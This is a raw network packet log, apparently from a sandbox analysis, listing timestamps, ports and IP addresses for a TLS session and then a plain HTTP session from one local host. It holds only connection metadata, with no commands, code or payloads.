Nov 20, 2024 07:50:17.969588995 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.969750881 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.969805956 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.969816923 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.969955921 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.970010996 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.970019102 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.970236063 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.970314980 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.970323086 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.970463037 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.970520020 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.970527887 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.970772028 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.970824957 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.970833063 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.971013069 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.971079111 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.971086025 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.971190929 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.971250057 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.971259117 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.971385956 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.971438885 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.971446991 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.971596003 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.971652031 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.971661091 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.971756935 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.971811056 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.971820116 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.972024918 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.972079992 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.972088099 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.972198009 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.972256899 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.972265005 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.972410917 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.972465992 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.972474098 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.057277918 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.057396889 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.057411909 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.057579994 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.057632923 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.057641029 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.057914019 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.057970047 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.057977915 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.058199883 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.058254957 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.058264971 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.058368921 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.058418036 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.058425903 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.058651924 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.058702946 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.058711052 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.058952093 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.059005976 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.059014082 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.059180975 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.059231997 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.059242010 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.059469938 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.059520960 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.059529066 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.059705019 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.059755087 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.059762955 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.059883118 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.059954882 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.059962988 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.060060978 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.060111046 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.060120106 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.060265064 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.060328960 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.060342073 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.060436964 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.060489893 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.060497999 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.060719967 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.060771942 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.060781002 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.060930014 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.060977936 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.060986996 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.145381927 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.145463943 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.145483017 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.145519018 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.145570993 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.145579100 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.145809889 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.145854950 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.145862103 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.146009922 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.146056890 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.146064997 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.146281004 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.146326065 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.146333933 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.146519899 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.146572113 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.146579981 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.146753073 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.146802902 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.146811962 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.147000074 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.147053003 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.147062063 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.147228956 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.147300005 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.147308111 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.147443056 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.147490978 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.147499084 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.147608995 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.147653103 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.147660017 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.147779942 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.147825956 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.147833109 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.147994995 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.148042917 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.148051023 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.148174047 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.148221016 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.148228884 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.148370981 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.148416996 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.148423910 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.148598909 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.148644924 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.148653984 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.160804987 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.232966900 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.233077049 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.233093977 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.233213902 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.233278036 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.233287096 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.233474016 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.233527899 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.233536005 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.233783960 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.233841896 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.233850002 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.233969927 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.234024048 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.234035015 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.234235048 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.234292030 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.234301090 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.234478951 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.234530926 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.234539032 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.234692097 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.234744072 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.234751940 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.234867096 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.234924078 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.234932899 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.235076904 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.235138893 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.235147953 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.235322952 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.235380888 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.235389948 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.235527039 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.235584974 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.235594034 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.235667944 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.235727072 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.235743046 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.235838890 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.235898018 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.235905886 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.236046076 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.236103058 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.236110926 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.236263990 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.236323118 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.236331940 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.320961952 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.321008921 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.321048021 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.321131945 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.321175098 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.321196079 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.321796894 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.321842909 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.321855068 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.321866989 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.321901083 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.322130919 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.322182894 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.322191000 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.322204113 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:18.322247028 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.338793039 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:18.699810028 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:32.024276972 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.029198885 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.029308081 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.029369116 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.034466982 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.630189896 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.630245924 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.630250931 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.630256891 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.630261898 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.630283117 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.630290985 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.630296946 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.630301952 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.630306959 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.630460024 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.635400057 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.635453939 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.635462999 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.635526896 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.722420931 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.722455025 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.722466946 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.722491026 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.722570896 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.722790003 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.722801924 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.722824097 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.722835064 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.722851038 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.722857952 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.722896099 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.723665953 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.723689079 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.723701000 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.723720074 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.723731995 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.723736048 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.723779917 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.723779917 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.724423885 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.724464893 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.724482059 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.724519968 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.724522114 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.724536896 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.724579096 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.725361109 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.725372076 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.725394011 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.725408077 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.725425005 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.725471973 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.758575916 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.758604050 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.758621931 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.758634090 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.758680105 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.758680105 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.814958096 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.814971924 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.814990997 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.815001965 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.815017939 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.815027952 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.815046072 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.815052032 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.815052032 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.815057993 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.815082073 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.815156937 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.817925930 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.818073034 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.818083048 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.818098068 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.818114042 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.818124056 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.818130016 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.818145037 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.818156958 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.818164110 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.818172932 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.818190098 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.818201065 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.818214893 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.818214893 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.818238974 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.818242073 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.818253994 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.818269968 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.818296909 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.818296909 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.818322897 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.818332911 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.818350077 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.818358898 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.818372965 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.818372965 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.818375111 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.818392992 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.818402052 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.818418026 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.818427086 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.818440914 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.818440914 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.818447113 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.818459034 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.818476915 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.818480015 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.818486929 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.818507910 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.818532944 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.818532944 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.818573952 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.822840929 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.822851896 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.822870970 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.822889090 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.822891951 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.822901011 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.822916985 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.822952032 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.822952032 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.851190090 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.851253986 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.851264000 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.851288080 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.851298094 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.851337910 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.854078054 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.907262087 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.907272100 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.907290936 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.907301903 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.907335997 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.907354116 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.907362938 CET	49167	80	192.168.2.22	192.3.22.13
